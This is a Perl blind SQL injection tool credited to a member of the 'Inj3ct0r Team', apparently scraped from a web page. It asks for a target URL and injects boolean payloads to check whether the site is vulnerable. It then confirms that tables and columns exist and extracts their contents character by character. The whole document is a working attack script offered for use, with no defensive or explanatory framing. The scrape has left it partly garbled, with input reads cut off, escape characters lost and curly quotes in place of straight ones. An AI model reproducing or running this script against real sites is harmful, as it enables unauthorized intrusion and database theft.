[cc lang=”perl”]#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################
$string=”;
$limit=0;
#string variable###############################################
# if the string that you want to use is not writable #
# on the shell you can write in this variable and #
# whene the script order from you the variable just #
# press enter. #
###############################################################
#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
$glob_stat;
print “nt===============================================*n”;
print “t* Blind Sql Injection Tool *n”;
print “t* Coded By Angel Injection *n”;
print “t* Member From Inj3ct0r Team *n”;
print “t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *n”;
print “t===============================================*nn”;
print “Stage 1:Checking if the target is vulnerablenn”;
print “You should now enter the infected urln”;
print “Example :http://www.localhost/index.php?id=1nn”;
print “URL: “;
my $url =
chomp($url);
$now = time_mili();
my $yes = get(“$url+and+1=1”);
$later = time_mili();
$exect = $later – $now;
$exect = sprintf(“%.2f”, $exect);
my $no = get(“$url+and+1=0”);
def($yes,$no);
print “Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]nn”;
print ” You should now enter a string(from shell or source code)n”;
print ” and wait to see if is a good one. Your string must be n”;
print ” related to the targetnn”;
print ” The string must exist on the true page or the false page n”;
print ” but not on both of them.n”;
print ” A file has been created under the name string.txt it may helpn”;
print ” you to choose your stringnn”;
if($string eq ”){
print “String: “;
$string =
chomp($string);
while(strc($yes,$no)!=1){
print “String: “;
$string =
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print “Please Choose another onen: “;
exit;
}
}
chomp($string);
print “n => Nice choicenn”;
print “Stage 3 :[*] Extracting Information From Database[*]nn”;
print ” You should now enter The Table namen”;
print ” and number of Columns to be extractedn”;
print ” and their names and condition on this columnsn”;
print ” if you want itnn”;
print “Table Name : “;
my $tbname =
chomp($tbname);
print “Columns Number : “;
my $num =
chomp($num);
if($num =~ /^[+-]?d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?d+$/){
print “Columns Number : “;
$num =
chomp($num);
}
}
chomp($num);
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){
print "Columns Name : ";
$column[$q] =
chomp($column[$q]);
}
print “n Do You have any condition on your informationn”;
print ” Exemple: where id=1nn”;
print “(yes/no): “;
my $condt =
chomp($condt);
if($condt eq ‘yes’){
print “nEnter Condition: “;
$condition=
chomp($condition);
}
print “nStage 3-1 :[*] Checking table and columns[*]nn”;
print ” Nothing That You Can do it nown”;
print ” just let the script do his jobnn”;
my $pr=chvar(“$url+and+(SELECT 1 from $tbname limit 0,1)=1″);
if($pr==1){
print ” => Table Existen”;
}
else{
print ” => Table Dosn’t Existe”;
exit;
}
my $j=0;
for(my $q=0;$q<$num;$q++){
$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){
$trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existen”;
$j++;
}
else{
print ” => Column $column[$q] Dosn’t Existen”;
}
}
$trco = @trcolumn;
if($trco==0){
print “n => No Columns Foundn”;
exit;
}
print “nStage 3-2 :[*] Extracting Columns length[*]nn”;
print ” The Script is going now to get eachn”;
print ” columns lengthn”;
print “nCounting length of Columns…nn”;
for(my $q=0;$q<$j;$q++){
my $qj=0;
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--
}
}
$ii++;
}
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $iin”;
}
for(my $rul=0;$rul<$trco;$rul++){
$result[$rul]='';
}
$gtf=0;
($second, $minute, $hour) = localtime();
print "nExtracting information ...nn";
print "Guessing time for each column(in seconds)nn";
for(my $idn=0;$idn<$trco;$idn++){
$max = $numtr[$idn] * $exect * 8;
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $maxn”;
}
print “nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)nn”;
$now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){
$nowt = time_mili();
for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){
my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)n”;
}
$later1 = time_mili();
$exect1 = $later1 – $now1;
$exect1 = sprintf(“%.2f”, $exect1);
($second, $minute, $hour) = localtime() ;
print “nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) nn”;
sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= “>57”;
my $isalpha = $url;
$isalpha .= “>96”;
my $isAlpha = $url;
$isAlpha .= “>65″;
my $rt=”;
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}
sub opt_sym(){
my $url = $_[0];
my $rt=”;
if($_[1]==1){
my $ft = $url;
$ft .= “>40”;
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}
sub reduse{
for(my $i=$_[0];$i<=$_[1];$i++){
my $tmp = $_[2];
$tmp .="=$i";
my $qq = chvar($tmp);
if($qq==1){
return $i;
last;
}
}
}
sub brute_sym(){
my $ek;
for(my $i=$_[1];$i<=$_[2];$i++){
my $tmp = $_[0];
$tmp .="=$ascii_sym[$i]";
my $qq = chvar($tmp);
if($qq==1){
$ek=$i;
last;
}
}
return $ascii_sym[$ek];
}
sub brute_num(){
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52″;
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}
sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt =”;
$ft .= “>$_[2]”;
$sd .= “>$_[3]”;
$td .= “>$_[4]”;
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
sub strc{
my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
$glob_stat=1;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
$glob_stat=0;
return 1;
}
elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}
sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt=”;
my $cn = @fi;
my $cn1 = @sd;
my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1;
my $i,$j=0;
for($i=0;$i<$k;$i++){
if($fi[$i] ne $sd[$i]){
$rt.=$fi[$i];
$j++;
}
}
if(($j>5) && ($j<($i-300))){
print "n => Target Maybe Vulnerablenn”;
open(MYFILE,’>string.txt’);
print MYFILE $rt;
close(MYFILE);
}
else{
print “n => Target Not Vulnerablenn”;
exit;
}
}
sub chvar{
my $url=$_[0];
my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
}
elsif($glob_stat==0){
return 0;
}
}
elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
}
elsif($glob_stat==0){
return 1;
}
}
}
sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = “$s.$m”;
$r +=0;
my $rt = sprintf(“%.3f”, $r);
$rt +=0;
return $rt;
}[/cc]